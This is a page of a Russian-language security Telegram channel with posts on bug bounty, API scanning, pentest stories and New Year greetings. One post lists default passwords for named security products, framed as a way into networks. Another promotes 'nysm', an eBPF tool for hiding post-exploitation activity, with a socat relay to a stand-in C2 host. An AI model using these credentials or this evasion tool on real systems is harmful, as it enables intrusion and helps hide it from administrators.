Похек – Telegram
Похек
16.2K subscribers
2.08K photos
110 videos
243 files
3.05K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from SecuriXy.kz
#BB #H1 #HackerOne Уходит с Казахстана в плане выплат...
👎11🎉5🥰3🎄3🤩1
🌚 AuthLogParser
#linux #LPE

Если кратко, то скрипт на PowerShell парсит логи на наличие данных авторизации. На первый взгляд классная штука.

Как получится воспользоваться на проекте, отпишу фидбек)

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥911
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
📝 Аудит спецификаций API на наличие уязвимостей логики

Продолжаем разговор про тестирование API. На этот раз не будет докера, мне было максимально лениво разбираться с Rust, не с игрой, а языком (Go для умных).

Инструмент, которым я буду сам пользоваться называется CherryBomb.

🗣 Краткое описание:

- Написан на Rust
- Имеет варианты запуска (info, normal, intrusive(не работает) , passive, full
- Требуется файл OpenAPI v3  в формате json (можете ваши yml переводить в него тут)

📌

Тестирование проводил всё на том же VAmPI

🗣 Использование:

cherrybomb --file openapi.json --profile full --ignore-tls-errors true -o report.json --format json


🗣 Репорт файл:

Жаль, что я не могу делать развёрнутые посты с несколькими скринами и подобным, но если кратко - умеет в читаемый вид (table), а также в формате json

📌

В скором времени напишу парсер в sarif или для defect dojo

#opensource #devsecops
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1222
Forwarded from PRO:PENTEST
😈 ПРОЕКТНЫЕ КЕЙСЫ:

🔥 ОБХОД СИСТЕМЫ СКУД В БЦ - https://news.1rj.ru/str/pro_pentest/11
🔥 КРАЖА ПРОПУСКА - https://news.1rj.ru/str/pro_pentest/17
🔥 ВЗЛОМ БАНКА - https://news.1rj.ru/str/pro_pentest/19
🔥 ВЗЛОМ КИНОСТУДИИ - https://news.1rj.ru/str/pro_pentest/20
🔥 ФИЗИКА С ЗАДЕРЖАНИЕМ ФСБ - https://news.1rj.ru/str/pro_pentest/36
🔥 ПРОЕКТ НА МИЛЛИОН - https://news.1rj.ru/str/pro_pentest/39
🔥 ВЗЛОМ БАНКА 2 - https://news.1rj.ru/str/pro_pentest/75
🔥 ВЗЛОМ ОТЕЛЯ - https://news.1rj.ru/str/pro_pentest/88
🔥 ВЗЛОМ НА ВЫСОТЕ - https://news.1rj.ru/str/pro_pentest/112

🤔 СТАТЬИ:

💯 ВВЕДЕНИЕ В НЛП ЧАСТЬ 1 - https://news.1rj.ru/str/pro_pentest/13
💯 ВВЕДЕНИЕ В НЛП ЧАСТЬ 2 - https://news.1rj.ru/str/pro_pentest/16
💯 ШАТАЕМ WI-FI (КАРМАННАЯ ШПОРА) - https://news.1rj.ru/str/pro_pentest/64
💯 ФИЗИЧЕСКИЙ ПЕНТЕСТ - https://xakep.ru/2023/01/19/physical-pentest/#toc13
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1721
Forwarded from BI.ZONE Bug Bounty
🏆 No more tears, good vibes only: подводим итоги года

Мы думали-думали, что же такое особенное подарить нашей десятке лучших... А потом как придумали! На двух загадочных фото в посте — подсказка ;)

А это список самых крутых багхантеров на нашей платформе в 2023 году:

1️⃣r0hack
2️⃣al88nsk
3️⃣artebels
4️⃣kwel
5️⃣ub1k
6️⃣BlackFan
7️⃣hodiebee
8️⃣freeman
9️⃣sergeym
1️⃣0️⃣zero-0x00 
1️⃣1️⃣arkiix

Хотим сказать спасибо всем, кто упорно багхантил на платформе весь год и поддерживал нас. 

А всех из десятки от души поздравляем, в ближайшее время свяжемся и отправим подарки.

Stay tuned!

UPD
arkiix влетел в рейтинг уже после подведения итогов, так что наш топ-10 магией Деда Мороза превратился в топ-11. Так держать!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤‍🔥1🎄11
E-mail Injection; Инъекции в почтовую функциональность веб-приложений

Порой разработчикам необходимо создавать формы – разделы для сбора информации от пользователей веб-приложения. Было придумано множество способов обработки и сбора ответов пользователей на формы. Выбор подходящего зависит от спектра условий: вида и предполагаемого объёма данных, допустимого объёма выделенного хранилища, желаемых характеристик доступа, ... ;

Так сложилось, что одним из вариантов решения упомянутой задачи является использование электронной почты. Электронная почта – комплексная технология, в работе которой задействован целый список компонентов.

👉 Сохраняй

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
12
GIGANEWS. Главные события 2023 года по версии «Хакера»

Год под­ходит к кон­цу, некото­рые уже начина­ют резать салаты, а зна­чит, приш­ло вре­мя огля­нуть­ся назад и вспом­нить самые важ­ные, инте­рес­ные и забав­ные события, которы­ми он нам запом­нится. По тра­диции мы сос­тавили для тебя под­борку наибо­лее ярких взло­мов, атак, уяз­вимос­тей, фей­лов и дру­гих событий ухо­дяще­го 2023 года. Будет инте­рес­но, пог­нали!

В статье подвели итоги по следующим аспектам:
- Атака года
- Уязвимость года
- Утечка года
- Исследование года
- Блокировка года
- Нарушитель приватности года
- Малварь года
- Хардверный взлом года
- Странность года
- Фейл года
- Хайп года

👉 Очень советую прочитать тем, кто особо не следил за ИБ новостями.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
103
Не ну вы поняли)

Новые программы для тех, кто не собирается отдыхать на новогодние праздники

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
21😎81
🌚 А вот и моя статистика подъехала. Практически миллион просмотров на постах за год. Великая цифра!!
В следующем году постарается сделать как минимум х1.5, а то и больше!!
А также +3.5к подписчиков на канале, то бишь канал за этот год вырос в более чем 2 раза. Всем спасибо, что вы были этот год со мной. Следующий год обещает быть ещё более взрывным!! 🪄🪄
Please open Telegram to view this post
VIEW IN TELEGRAM
25❤‍🔥8🔥43👏1
⚠️⚠️⚠️⚠️⚠️ Знаете что мне нравится? Аудитория канала :)

🌲 Наконец-то настали новогодние выходные. Кто-то вчера досдал проекты, кто-то планирует багхантить, пока остальные отдыхают. Я лично собираюсь так сильно отоспаться, насколько мне хватит сил. Что и вам рекомендую :D

🌚 Этот год вышел вполне успешым. Побывал мне кажется в 5 раз больше на конференциях, чем в прошлом году. Какие-то дали новых знакомых, какие-то помогли найти новую любимую работу, какие-то были душными и бесполезными (Газпром.тех я про тебя). Открытие 🏠 КиберДома было интересным событием второго полугодия 2023 года. Успешно выступал, как на тему ИБэшечка (фирменная преза), так и на тему Pivoting. За все выступления получал огромный фидбек от знакомых и ранее не знакомых людей, что было очень приятно 🙏 . Ну и конечно ребрендинг канала, который прошёл настолько успешно, насколько даже я не ожидал, если честно)

🌚 Но, но, но будущий год обещает быть ещё лучше 🌚
Новые партнёрства, постараюсь выступать почаще (если буду успевать готовить темы), прогрессивный рост канала, улучшение контента: постараюсь делать контент одновременно для начинающих ребят и для тех, кто уже разбираются.

🌚 Обязательно выпущу мерч Похек. Планируются как минимум стикерпаки и футболки. Пока проблемы с нахождением годных производителей. Если у вас есть опыт заказа, то напишите в ЛС, пожалуйста.

🌚 А ещё, кое что очень крутое готовим. Будет ... а вот узнаете в следующем году

👉Всем спасибо, дальше будет ещё интереснее!! Всех с наступающим Новым Годом ❤️

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
257🔥6🎄4❤‍🔥221
Похек pinned «⚠️⚠️⚠️⚠️⚠️ Знаете что мне нравится? Аудитория канала :) 🌲 Наконец-то настали новогодние выходные. Кто-то вчера досдал проекты, кто-то планирует багхантить, пока остальные отдыхают. Я лично собираюсь так сильно отоспаться, насколько мне хватит сил. Что и вам…»
Всех поздравляю с Новым Годом!!
🌲🌲🌲🌚🌚🌚💰💰🎁🎁
Please open Telegram to view this post
VIEW IN TELEGRAM
39🔥106🎄41
Forwarded from true_security
на пентестах бывают случаи когда компрометация происходит через средства обнаружения атак и средства защиты....далеко не все фильтруют сетевой доступ к компонентам СЗИ.
Так сказать, спасибо за дефолтные пароли:
- rvision soar/deception/etc... ssh root:pxtm0222; postgres rvision:pxtm0222

- maxpatrol VM: Administrator:P@ssw0rd

- maxpatrol siem: Administrator:P@ssw0rd; rabbitmq: siem:P@ssw0rd или mpx_siem:P@ssw0rd

- pt xdr: Administrator:P@ssw0rd

- pt nad: administrator:P0sitive или administrator:Administr@t0r

- security vision soar: postgres postgres:1q2w#E$R

- kuma (kaspersky siem): admin:mustB3Ch@ng3d!

Докидывайте дефолтные пароли сзи в комментах)
🔥122
🕶 Похек попал в ежегодный список топовых ИБ-каналов
Please open Telegram to view this post
VIEW IN TELEGRAM
38🔥13🎉8❤‍🔥1
А я в каком-то смысле тоже джун...

thx @wearetyomsmnv

#meme

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
28🐳4😎4
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 nysm
Скрытый контейнер для постэксплуатации

#eBPF #offensive

С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое

Как это работает?
Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.


Установка:
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make


Использование:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message

# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443


👉 https://github.com/eeriedusk/nysm

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
1233😎1